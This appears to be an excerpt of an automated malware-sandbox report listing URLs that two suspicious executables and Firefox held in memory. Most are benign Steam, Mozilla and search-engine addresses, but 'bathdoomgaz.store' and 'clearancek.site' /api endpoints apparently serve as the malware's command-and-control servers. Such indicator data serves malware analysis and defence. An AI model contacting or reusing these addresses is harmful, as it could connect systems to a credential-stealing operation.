Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_IDLE_NO_PROGRESS_TIMEOUT_SECSBITS_ACTIVE_NO_PROGRESS_TIME
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2006/browser/search/
Source: firefox.exe, 0000001B.00000002.3303896282.0000017084364000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3297648118.0000017083A4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083D06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3328273548.0000017085378000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000002.3303896282.00000170843A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3298702178.0000017083B62000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3140375885.000001708537E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083D8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300092608.0000017083DA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3277613041.0000017081195000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708310D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulprivacy.trackingprotection.fingerprinti
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caCACHE_EXPIRATION_TIME_PREF_NAME
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.00000170831F8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpifirefox-desktop
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpihttps://addo
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushedmatch
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956https://addons.
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_PRIVACY_1
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: file.exe, 00000000.00000003.2134302834.0000000000A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.slt
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8d
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dY
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8du
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bathdoomgaz.store:443/api
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdy
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clearancek.site:443/apiVi
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.c0
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/c
Source: 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/
Source: file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.0000000001136000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=e
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
